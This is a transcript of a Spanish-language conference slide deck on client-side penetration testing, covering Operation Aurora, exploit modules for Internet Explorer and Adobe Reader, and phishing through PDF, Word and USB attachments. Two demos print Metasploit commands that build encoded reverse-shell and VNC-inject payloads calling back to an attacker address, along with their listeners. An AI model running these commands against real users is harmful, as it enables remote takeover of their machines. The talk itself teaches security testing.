what works on client side pentesting
TRANSCRIPT
![Page 1: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/1.jpg)
What Work’s OnClient Side Pentesting
CAMPUS PARTY COLOMBIA 2010
I’m a UserI’m a Pentester
![Page 3: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/3.jpg)
iLifekungfoosion.com
@kfs
www.linkedin.com/in/lpigner
![Page 4: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/4.jpg)
![Page 6: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/6.jpg)
Agenda
• ¿ Por Qué Client Side ?
• La Operación Aurora
• Distribución y Ataques
• Conclusión
![Page 7: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/7.jpg)
¿ Por Qué Client Side ?
![Page 8: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/8.jpg)
DIFERENTES TIPOS DE PENETRATION TESTING
Phone Attacker
Wardialinges lo mejor!
Network Attacker
No! Yo tengo un 0-day para
IIS 6.0!
Social Engineer
Jodanse!Yo entro
caminando
![Page 9: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/9.jpg)
DMZ
LAN
DOMINIO
SMTP WWW
Firewall
ATACANTE
INTERNET
BASE DEDATOS
![Page 10: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/10.jpg)
DMZ
LAN
DOMINIO
SMTP WWW
Firewall
INTERNET
BASE DEDATOS
IPSReverse Proxy
IDS
Web App FW
ATACANTE
![Page 11: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/11.jpg)
DMZ
LAN
Firewall
ATACANTE
INTERNET
![Page 12: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/12.jpg)
![Page 13: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/13.jpg)
![Page 14: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/14.jpg)
![Page 15: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/15.jpg)
Agenda
• ¿ Por Qué Client Side ?
• La Operación Aurora
• Distribución y Ataques
• Conclusión
![Page 16: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/16.jpg)
La Operación Aurora
![Page 17: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/17.jpg)
12 de Enerode 2010
[2] Google Blog: A new approach to China
“ataques altamente sofisticados y dirigidos ... originados desde China”
![Page 18: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/18.jpg)
+ 30[1] Wikipedia: Operation Aurora
![Page 19: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/19.jpg)
“Operación Aurora”
![Page 20: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/20.jpg)
Google se va de China (?)
![Page 21: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/21.jpg)
Google.cn
![Page 22: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/22.jpg)
Google.com.ar
![Page 23: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/23.jpg)
“illegal flower
tribute”
[4] Wikipedia: Illegal flower tribute
![Page 24: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/24.jpg)
Texas
Taiwan
PDF, DOC, XLS, CAD, E-mail
CAB, RAR
[3] Mandiant M-Trends “the advanced persistent threat”
y el resto...
![Page 25: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/25.jpg)
![Page 26: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/26.jpg)
0-day para IE 6-7-8
[6] Wepawet exploit[7] German government warns against using MS Explorer
- 12 de Enero: Anuncio de Google
- 14 de Enero: Exploit en Wepawet
- 14 de Enero: Advisory de Microsoft
- 15 de Enero: PoC de MetaSploit
- 21 de Enero: Microsoft update (fuera de ciclo)
![Page 27: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/27.jpg)
DEMO #1 “Aurora”
www
Mas información en:
KUNGFOOSION: Estalló la CyberGuerra!
![Page 28: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/28.jpg)
OSVDB 61697This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
Afecta a:- Internet Explorer 6- Internet Explorer 7- Internet Explorer 8
![Page 29: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/29.jpg)
Agenda
• ¿ Por Qué Client Side ?
• La Operación Aurora
• Distribución y Ataques
• Conclusión
![Page 30: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/30.jpg)
Distribución y Ataques
![Page 31: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/31.jpg)
![Page 32: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/32.jpg)
![Page 33: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/33.jpg)
![Page 34: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/34.jpg)
![Page 35: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/35.jpg)
![Page 36: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/36.jpg)
payload+
encoding
![Page 37: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/37.jpg)
DEMO #2 “Payload + Encoding”
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 X > payload_1.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 3 -t exe -o payload_2.exe
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
![Page 38: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/38.jpg)
Tienes un E-Mail
![Page 39: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/39.jpg)
![Page 40: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/40.jpg)
![Page 41: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/41.jpg)
CASO de ESTUDIO (?)
![Page 42: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/42.jpg)
![Page 43: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/43.jpg)
25000 mails
1883 interesados
![Page 44: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/44.jpg)
Browsers
![Page 45: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/45.jpg)
SistemaOperativo
![Page 46: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/46.jpg)
Soporte de Java
![Page 47: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/47.jpg)
Versionesde Flash
![Page 48: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/48.jpg)
Tienes un E-Mail
Abre miadjunto!
![Page 49: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/49.jpg)
![Page 50: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/50.jpg)
![Page 51: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/51.jpg)
Archivos Mas Utilizados
38%
7%4%
47%
3%
DOC XLS PPTPDF otros
![Page 52: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/52.jpg)
[8] PDF Based Target Attacks are Increasing
2008
1968
2009
2195
2010
895
![Page 53: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/53.jpg)
DEMO #3 “PDF Exploit”Mas información en:
KUNGFOOSION: Explotando el 0-day de Adobe Reader
![Page 54: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/54.jpg)
OSVDB 61697This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.
Afecta a:- Adobe Reader 8.1.2
![Page 55: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/55.jpg)
DEMO #4 “PDF + EXE”
+EXE
Mas información en:
KUNGFOOSION: Embebiendo un Ejecutable dentro de un PDF con MetaSploit
![Page 56: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/56.jpg)
+ EXE
![Page 57: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/57.jpg)
[8] PDF Based Target Attacks are Increasing
2008
1968
2009
2195
2010
895
![Page 58: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/58.jpg)
DEMO #5 “Word”
![Page 59: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/59.jpg)
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 V > macro_word.bas
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
DEMO #5 “Word”
![Page 60: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/60.jpg)
![Page 61: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/61.jpg)
La Recepcionista
![Page 62: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/62.jpg)
DEMO #6 “USB U3”Mas información en:
KUNGFOOSION: Ataque USB U3 con MetaSploit
![Page 63: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/63.jpg)
SETsocial engineering toolkit
“The Java Applet Attack”Mas información en:
KUNGFOOSION: Ingeniería Social con Applets firmados de Java en MetaSploit
![Page 64: What works on client side pentesting](https://reader035.vdocument.in/reader035/viewer/2022062406/55a3b4b01a28ab520f8b4702/html5/thumbnails/64.jpg)
Gracias!kungfoosion.com
@kfs
www.linkedin.com/in/lpigner